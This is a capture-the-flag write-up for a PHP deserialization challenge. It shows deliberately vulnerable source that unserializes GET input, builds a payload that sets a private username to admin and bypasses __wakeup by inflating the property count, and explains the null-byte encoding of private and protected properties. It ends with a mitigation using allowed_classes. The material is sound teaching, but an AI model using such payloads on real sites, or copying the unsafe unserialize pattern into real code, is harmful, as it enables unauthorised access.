[Geek Challenge (極客大挑戰) 2019] PHP1

Knowledge points: PHP serialization and deserialization. There are a few extension notes at the bottom worth reading.

The challenge says a backup was made, so the first step is to scan directories and dig out the backed-up source files.

dirsearch finds the www.zip archive.


After unzipping it, the challenge turns out to be about deserialization.

The specifics are as follows:

index.php contains the following code: it takes a parameter and unserializes it

<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>

class.php contains the following (the full source is here):

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

Building the payload

Declare a Name class with username and password; both are private. Every word of that sentence matters.

From the checks we know username must be 'admin' and password must be 100, so build the serialized string accordingly.

In the serialized form, O is an object, s is a string and i is an integer.

Because the properties are private, %00 has to be inserted to stand in for the "space" characters (really null bytes) that appear in the property names.

Construction: O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

payload: url+?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

Note that the payload declares 3 properties while the object only carries 2. __wakeup() would reset username to 'guest' on deserialization, and on PHP versions before 5.6.25 and 7.0.10 a declared property count larger than the real one makes unserialize() skip __wakeup(), which is why the count is bumped.

Below are the extension notes and Q&A:

When I looked at the payloads other people had posted, I was puzzled: why is it written in the form %00Name%00username?

So I tested the three visibility modifiers: public, protected and private.

Then it clicked:

Only public properties can be written as-is, with no extra decoration; private properties need the %00Name%00 prefix,

and protected properties need the form %00*%00username.

Protected properties: the output after running is shown in the comment inside the code

<?php
class Name{
	protected $username = 'nonono'; //////////////// look at these two lines
	protected $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
// LOOK HERE, LOOK HERE!!!!!!!!!
// Running this outputs O:4:"Name":2:{s:11:" * username";s:5:"admin";s:11:" * password";i:100;}
// (the "spaces" around * are null bytes, \0, which echo renders invisibly; hence %00 in the URL)
?>


Public properties: the output after running is shown in the comment inside the code

<?php
class Name{
	public $username = 'nonono';
	public $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
?>

Private properties: the output after running is shown in the comment inside the code

<?php
class Name{
	private $username = 'nonono';
	private $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
// (the "spaces" around Name are null bytes, \0; the length 14 counts them)
?>
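To make the %00 question above concrete and to show the defensive counterpart, here is an added example (my own code, not from the writeup or the challenge source). It uses a cut-down copy of the challenge's Name class without __destruct and assumes PHP 7.0 or later for the allowed_classes option.

```php
<?php
// Added example, not part of the original writeup or the challenge source.
// Cut-down copy of the challenge's Name class (no __destruct) to show
// (1) how serialize() mangles private property names and why the URL
// payload needs %00, and (2) the allowed_classes option (PHP >= 7.0)
// that stops attacker-supplied objects from being instantiated at all.

class Name {
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username, $password) {
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup() {
        $this->username = 'guest';
    }
}

$s = serialize(new Name('admin', 100));

// echo hides the NUL bytes around "Name"; urlencode() (or bin2hex())
// makes them visible as %00, which is exactly the form used in the URL.
echo "raw:        ", $s, "\n";
echo "urlencoded: ", urlencode($s), "\n";

// Normal unserialize(): the object is rebuilt and __wakeup() runs,
// which is what overwrites username with 'guest' in the challenge.
$obj = unserialize($s);
var_dump($obj);

// Mitigation: never let untrusted input choose a class. With
// allowed_classes => false the data becomes __PHP_Incomplete_Class,
// so Name::__wakeup() and Name::__destruct() can never be triggered.
$safe = unserialize($s, ['allowed_classes' => false]);
echo "class with allowed_classes=false: ", get_class($safe), "\n";
```

Run it with `php example.php`; compare the urlencoded line with the payload above, and note that the last line no longer names the Name class at all.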

